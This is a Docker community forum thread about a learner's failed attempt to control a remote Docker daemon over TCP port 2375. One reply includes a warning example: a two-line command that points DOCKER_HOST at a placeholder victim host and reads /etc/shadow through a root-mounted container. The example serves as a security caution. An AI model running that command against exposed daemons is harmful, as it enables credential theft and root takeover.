Docker Community Forums

Share and learn in the Docker community.

Newbie Question re: Docker Networking


(Mmonce) #1

I’m doing some self-paced training on Docker and in an early lesson, the instructor shows how you configure the Docker daemon to listen on Port 2375 over a network. Let’s call this “Docker Host 1”. I can see that after configuring the Docker config files and restarting the Daemon, “Docker Host 1” is listening over port 2375 on the IP address of the host Ubuntu server.

The instructor then tries to have us demonstrate how you can connect to that port remotely from a second Docker host we will call “Docker Host 2”, by setting the “DOCKER_HOST” environment variable to tcp://<ip of Docker Host 1>:2375. Then, he says, when you run simple docker client commands from “Docker Host 2”, the results come from the Docker daemon on “Docker Host 1”. (Commands like “docker -v”, “docker version” and “docker info”.) In his demo, when you run these commands from “Docker Host 2”, the info is clearly coming from “Docker Host 1” which is running a slightly different version of Docker Engine. This is meant to demonstrate that a Docker client can execute commands locally, or over a network.

The problem for me is that this is not how it is working. All of the simple docker client commands I run are clearly returning data from Docker Host 2.

I’ve some basic network connectivity checks between the two hosts. I can ping the host IP addresses in both directions, I can telnet from Host 2 to Host 1 over Port 2375 to verify no firewalls. I even configured “Host 1” client to connect to itself over tcp as opposed to the local socket (default). The only thing that fails is trying to use commands on Host 2 to get responses from Host 1.

This all sounds kind of trivial (maybe), but I’m concerned that I may be missing some key aspect of the Docker networking stack that will bite me later in the training when I try to perform more complex and useful tasks.

NOTE: Docker Host 1 is running Ubuntu v 16.04; this host is running Docker Engine: 1.10.3
Docker Host 2 is running CentOS 7 and running Docker Engine 1.11.2


(David Maze) #2

Oh dear.

Or, for instance,

export DOCKER_HOST=tcp://unwitting-victim.example.com:2375/
docker run --rm -v /:/host ubuntu:16.04 cat /host/etc/shadow

if you want to steal the host’s password file…as one of the most benign things it’s possible to do with unrestricted network-visible root access to the system.

I wouldn’t try to go especially far down this path. ssh to the other host system to run containers there.

(Do you actually have the variable exported? Does env | grep DOCKER show it?)


(Mmonce) #3

Thanks. I understand that the instructor’s use case isn’t best practice, and he stated so when describing how to set it up. It’s just a demonstration for training. If this is not how container host to host communications is typically done, I’m not going to worry too much about it. It just seemed like a basic config and if it wasn’t working, I might find myself stopped in my tracks later in the course.

Thanks.